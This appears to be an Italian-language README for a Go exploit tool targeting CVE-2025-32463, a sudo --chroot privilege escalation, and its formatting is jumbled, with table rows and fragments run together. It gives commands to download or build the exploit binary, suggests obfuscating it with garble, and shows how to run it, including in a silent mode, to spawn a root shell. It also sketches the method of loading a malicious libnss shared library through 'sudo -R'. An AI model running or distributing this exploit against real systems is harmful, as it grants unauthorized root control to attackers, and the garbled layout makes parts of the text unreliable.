
Questa CVE affronta una vulnerabilità nelle versioni di sudo 1.9.14 e 1.9.17, consentendo l'escalation non autorizzata dei privilegi locali fino all'accesso root.
Questo repository fornisce un tool di exploit basato su Go per CVE-2025-32463, una vulnerabilità critica di escalation dei privilegi locali (CVSS 9.3) nelle versioni di sudo 1.9.14 fino a 1.9.17. Consente a utenti locali non autorizzati di ottenere accesso root sfruttando un difetto nell'opzione --chroot (-R).
⚠️ Avvertenza: Solo a scopo educativo e di test. Da utilizzare in ambienti isolati (es. VM). Non per uso dannoso.
--chrootcurl -L https://github.com/Nowafen/CVE-2025-32463/releases/download/exploit/exploit -o exploit
chmod +x exploit
./exploit --execution # Avvia una shell root
git clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
go build -o exploit # Oppure usa garble per l'offuscamento
./exploit --execution
| Comando | Descrizione |
|---|---|
./exploit --help | Mostra l'aiuto sull'uso |
./exploit --about |
Verifica: Nella shell root, esegui id (dovrebbe mostrare uid=0(root)) oppure whoami (dovrebbe mostrare root).
/tmp/sudowoot.stage.*woot1337.c) per la shell rootlibnss_/woot1337.so.2)sudo -R woot woot per caricare la libreria ed escalare i privilegiDefaults !use_chroot a /etc/sudoersQuesto strumento è per la ricerca sulla sicurezza. L'autore non è responsabile per un uso improprio. Esegui sempre test in modo responsabile.
Creato da MNM
| Mostra i dettagli della CVE |
./exploit --execution | Esegue l'exploit (apre una shell root) |
./exploit --execution --silent | Esecuzione in modalità silenziosa |